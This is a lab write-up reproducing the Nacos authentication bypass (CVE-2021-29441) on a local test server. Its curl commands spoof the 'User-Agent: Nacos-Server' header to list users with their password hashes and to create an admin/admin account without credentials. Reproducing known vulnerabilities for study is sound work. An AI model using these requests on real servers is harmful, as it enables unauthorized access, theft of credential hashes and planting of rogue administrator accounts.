Nacos Authentication Bypass Vulnerability Reproduction


Preface

https://github.com/alibaba/nacos/issues/4701

https://nvd.nist.gov/vuln/detail/CVE-2021-29441

Alibaba Nacos authentication bypass vulnerability reproduction (FreeBuf write-up)

https://www.freebuf.com/vuls/263845.html

Environment setup

wget https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz
tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
cd nacos/bin
./startup.sh -m standalone

Open http://ip:8848/nacos/#/login and log in with the default credentials nacos/nacos.

http://10.63.0.14:8848/nacos/#/login

Reproduction record

Step 1: List the current users

With authentication disabled (the default in this build), the user listing endpoint answers without any credentials:

http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=100

Step 2: Enable authentication

Edit conf/application.properties, set nacos.core.auth.enabled=true, and restart the server:

ps -ef | grep nacos
kill -9 <nacos-pid>    # pid from the ps output above; bin/shutdown.sh also works

grep nacos.core.auth.enabled conf/application.properties
nacos.core.auth.enabled=true

Start it again:
./bin/startup.sh -m standalone

Call the endpoint again; with auth enabled the unauthenticated request is now rejected:

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9'
{"timestamp":"2022-03-07T19:05:12.209+08:00","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/auth/users"}

Step 3: Bypass

In the affected versions the AuthFilter lets a request through without any credential check when its User-Agent identifies it as coming from another Nacos server (the header used for server-to-server calls), so spoofing User-Agent: Nacos-Server is enough:

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"pageItems": [
{
"password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
"username": "nacos"
}
],
"pageNumber": 1,
"pagesAvailable": 1,
"totalCount": 1
}

Step 4: Create a user

The same header also gets unauthenticated writes through. Here a user named admin with password admin is created, then the listing is repeated to confirm it:

curl -X POST 'http://10.63.0.14:8848/nacos/v1/auth/users?username=admin&password=admin' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"code": 200,
"data": null,
"message": "create user ok!"
}

curl -X GET 'http://10.63.0.14:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' -H 'User-Agent: Nacos-Server' | python -m json.tool
{
"pageItems": [
{
"password": "$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu",
"username": "nacos"
},
{
"password": "$2a$10$FW35Bu3vApps1EmIm105eOuAEP2UBAxXbXtEwIpdxkEMmn/Qvr7de",
"username": "admin"
}
],
"pageNumber": 1,
"pagesAvailable": 1,
"totalCount": 2
}

User management page: http://10.63.0.14:8848/nacos/#/userManagement

The user we created also shows up there.

That's all.